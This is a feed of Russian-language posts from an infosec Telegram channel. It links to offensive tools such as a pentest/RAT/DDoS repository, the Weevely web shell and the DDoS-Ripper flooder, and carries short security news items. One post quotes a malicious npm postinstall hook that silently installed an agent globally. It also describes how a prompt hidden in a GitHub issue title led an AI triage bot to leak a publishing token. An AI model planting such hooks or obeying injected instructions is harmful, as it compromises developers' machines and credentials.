Не хакинг, а ИБ
18.4K subscribers
1.1K photos
47 videos
102 files
1.23K links
Лучшие материалы со всего интернета по ИБ и этичному хакингу.

Реклама/сотрудничество: @workhouse_price

Мы на бирже: https://telega.in/c/searchack

Канал в реестре РКН: https://clck.ru/3FtTUG
Download Telegram
🧰 Набор инструментов для тестирования на проникновение

В данном репозитории собрали:
– Анонимное сокрытие инструментов
– Инструменты сбора информации
– Генераторы списков слов
– Инструменты беспроводной атаки
– Инструменты для внедрения SQL-запросов
– Инструменты фишинговой атаки
– Инструменты веб-атак
– Инструменты для последующей эксплуатации
– Инструменты судебной экспертизы
– Инструменты для создания полезной нагрузки
– Платформы для использования эксплойтов
– Обратный инжиниринг
– Сканирование веб-страниц
– Инструменты для проведения DDOS-атак
– Инструменты удаленного администратора
(RAT)
– Инструменты XSS-атаки
– Инструменты для стеганографии

Репозиторий постоянно обновляется!

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
😁63👎2😈2
😈 Хакинг бытовой техники: от реверса стиралки к созданию открытого сервисного ПО

— Сегодня разберем доклад Hacking Washing Machines с конференции 39C3 и посмотрим, как мелкая бытовая неисправность привела к полноценному реверсу стиралки, а затем – к созданию свободной утилиты, которая заменяет закрытый фирменный софт для ремонта техники Miele

Доклад получился объемным, поэтому для удобства читателей он разделен на две части:
1. Первая про опыт исследования техники Miele
2. Второй про шину D-Bus как универсальную отмычку к экосистеме бренда BSH

🗄 Читать статью – линк.
🗄 Хакинг бытовой техники: одна шина, чтобы управлять всеми – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥2
🖥 Ваша повседневная шпаргалка по Matplotlib

Предлагаем вашему вниманию полное руководство по визуализации на Python

Matplotlib – библиотека на Python для визуализации данных двумерной и трёхмерной графикой

Он имеет отличную поддержку множеством сред, таких, как веб-серверы приложений, графические библиотеки пользовательского интерфейса, Jupiter Notebook, iPython Notebook и оболочка iPython

Выкладывать еще материалы по программированию?
💊 – да
🗿 – не стоит


🗄 Шпаргалка – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
💊8🙏1
❗️ Веб-шелл для автоматического заражения сети

Weevely
– это веб-шелл командной строки, динамически распространяемый по сети во время выполнения

Просто закиньте PHP скрипт, и программа обеспечит похожий на ssh терминал даже в ограниченном окружении


— Оставляющий мало следов агент и более 30 модулей формируют расширяемый фреймворк для:
администрирования веб-аккаунтов;
постэксплуатационного повышения привилегий веб-серверов;
и латерального продвижения по сети.

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍42
😂 Налоговая служба Южной Кореи случайно раскрыла seed-фразу для изъятого криптокошелька

Национальная налоговая служба Южной Кореи (National Tax Service, NTS) отчиталась о результатах операции против 124 крупных неплательщиков налогов


⚠️ В ходе рейдов удалось конфисковать активы на общую сумму 8,1 млрд вон (~5,6 млн $), включая наличные, предметы роскоши и криптовалюту

— Для наглядности они решили приложить к своему пресс-релизу фотографии изъятого у неплательщиков имущества

Среди них оказался снимок аппаратного кошелька Ledger, а также на фото попала и рукописная заметка с seed-фразой от него

Результат не заставил себя ждать: спустя пару часасов неизвестные вывели с конфискованного кошелька 4 млн токенов Pre-Retogeum (PRTG), оценивавшихся примерно в 4,8 млн $ на момент кражи

🗄 Источник – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
😁174🗿2
🛡 Большое руководство по работе с Angie

Этот цикл статей будет посвящен веб‑серверу Angie

Angie
это современный веб-сервер и обратный прокси с открытым исходным кодом, основанный на веб-сервере Nginx

Проект был инициирован в 2013 году компанией Angie Software с целью улучшить возможности Nginx, а также расширить его функциональность для большего удобства использования в корпоративных и облачных средах

Навигация по циклу:
🗄 Почему стоит переходить на Angie.
🗄 Установка Angie из пакетов и в докере.
🗄 Переезд с Nginx на Angie. Пошаговая инструкция.
🗄 Настройка location в Angie. Разделение динамических и статических запросов.
🗄 Перенаправления в Angie: return, rewrite и примеры их применения.
🗄 Сжатие текста в Angie: статика, динамика, производительность.
🗄 Серверное кэширование в Angie: тонкости настройки.
🗄 Настройка TLS в Angie: безопасность и скорость.
🗄 Настройка Angie в роли обратного HTTP-прокси.
🗄 Балансировка нагрузки для HTTP(S) в Angie.
🗄 Мониторинг Angie с помощью Console Light и API.
🗄 Балансировка и проксирование L4-трафика в Angie.
🗄 Клиентское кэширование в Angie.
🗄 Динамические группы проксируемых серверов в Angie.
🗄 Мониторинг Angie с Prometheus и Grafana.
🗄 Отказоустойчивый кластер Angie с VRRP и Keepalived.
🗄 Контроль доступа в Angie.
🗄 Аутентификация клиентов в Angie с помощью TLS-сертификатов.
🗄 Кастомизация Angie (njs, Lua, Perl).
🗄 Запуск CGI-скриптов в Angie.
🗄 Защита от DoS-атак в Angie стандартными модулями.
🗄 Защита от DoS-атак в Angie (дополнительные средства).


// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
📝 Awesome Hacking — золотая жила для специалистов по безопасности

Awesome Hacking
– это кураторская подборка из более чем 50 тематических списков ресурсов по информационной безопасности

Создатели собрали в одном месте:
Инструменты для пентеста
Обучающие материалы
Примеры эксплойтов
Лабораторные среды
Исследования по безопасности

Проект насчитывает почти 100 тысяч звезд на GitHub и регулярно обновляется сообществом

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
❗️ Инструмент имитации DDoS-атак

DDoS-Ripper – инструмент для тестирования сети, который имитирует атаки Distributed Denial of Service (DDoS)

— Он генерирует высокие объёмы HTTP-запросов с одной машины с помощью нескольких параллельных потоков

DDoS-Ripper совместим с несколькими платформами, включая Linux, Windows, MacOS и Termux


🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
😈 Сын правительственного подрядчика украл у Службы маршалов криптовалюту на 46 млн долларов

Арестован сын правительственного подрядчика США, Джон Дагита, которого обвиняют в хищении более 46 млн долларов в криптовалюте у Службы маршалов

Джон Дагита – сын Дина Дагиты, президента и генерального директора компании Command Services & Support (CMDSS), базирующейся в Вирджинии

⚠️ С октября 2024 года эта фирма помогала Службе маршалов США управлять и распоряжаться конфискованными у преступников цифровыми активами

«В конце января 2026 года я раскрыл, как Джон украл более 46 млн долларов в конфискованных криптоактивах у правительства США, злоупотребив доступом к ресурсам CMDSS — компании его отца, у которой был контракт со Службой маршалов.

Затем Джон несколько раз дразнил меня через свой Telegram-канал и проводил dust-атаки на мой публичный кошелек, используя украденные средства. Ну и кто смеется теперь, Джон?» — написал известный блокчейн-аналитик ZachXBT


По данным ZachXBT, Дагита сам себя раскрыл во время конфликта с другим злоумышленником в приватном чате Telegram, который был записан

В этой переписке он продемонстрировал, что способен в реальном времени перемещать крупные суммы между двумя криптокошельками

Дальнейший анализ позволил связать эти кошельки с правительственными активами, конфискованными после взлома биржи Bitfinex

🗄 Источник – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥52
⚡️РОЗЫГРЫШ В ЧЕСТЬ ОТКРЫТИЯ В MAX

Теперь наши каналы доступны не только здесь, но и на платформе MAX.  В честь этого события разыгрываем три приза, которые усилят вашу защиту в сети.

ПРИЗОВОЙ ФОНД:
⚠️ 1 МЕСТО: YubiKey 5 Series
Физический ключ, который делает двухфакторную аутентификацию неуязвимой. Никакой фишинг и слив паролей не страшны, пока ключ у вас.

⚠️ 2 МЕСТО: SATOSHI VPN на 1 год
Полная анонимность и шифрование трафика. Ваши данные под защитой в любых сетях.

⚠️ 3 МЕСТО: Книга "Хакерская самооборона" (Андрей Жуков, 2026)
Актуальная новинка по активной обороне. Учитесь думать как хакер, чтобы защищаться от реальных угроз.

📎 УСЛОВИЯ ПРОСТЫЕ:
Быть подписанным на этот канал (где вы читаете пост).

Быть подписанным на все 4 канала в MAX по ссылкам ниже.
→ max.ru/becaps
→ max.ru/cyberins
→ max.ru/itbook_library
→ max.ru/nsis_cybersec

📌 Нажать кнопку "Участвую" под этим постом.

Итоги подведём ровно через 20 дней с помощью рандомайзера 28.03.26 14:00MSK.
Please open Telegram to view this post
VIEW IN TELEGRAM
👎255👍3🤬3💊1
😂 Агент под прикрытием: как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля в репозитории npm была опубликована версия cline@2.3.0. С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт

Лишь в файле package.json притаилась одна лишняя строчка:
 "postinstall": "npm install -g openclaw@latest"


В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw

— Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса – пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа

Но самое поразительное здесь не сама начинка вредоноса – весь фокус в том, как именно злоумышленник раздобыл npm-токен – ключ от всех дверей

⚠️ Оказалось, он просто спрятал инструкцию (промпт) прямо в заголовке тикета на GitHub

Бот, занимавшийся сортировкой заявок, прочитал этот заголовок, принял его за приказ и послушно исполнил

🗄 Читать статью – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍52
📝 Подборка материалов по мобильной безопасности «Awesome Mobile Security»

— Здесь собраны материалы, которые могут быть полезны с практической точки зрения: из них можно узнать о новых способах атак на приложения, прочитать о новых уязвимостях, изучить, как работают механизмы операционной системы и т.д.

Для удобства все материалы, которые есть на русском языке, выделены в подпункты

🗄 Читать статью – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
💊2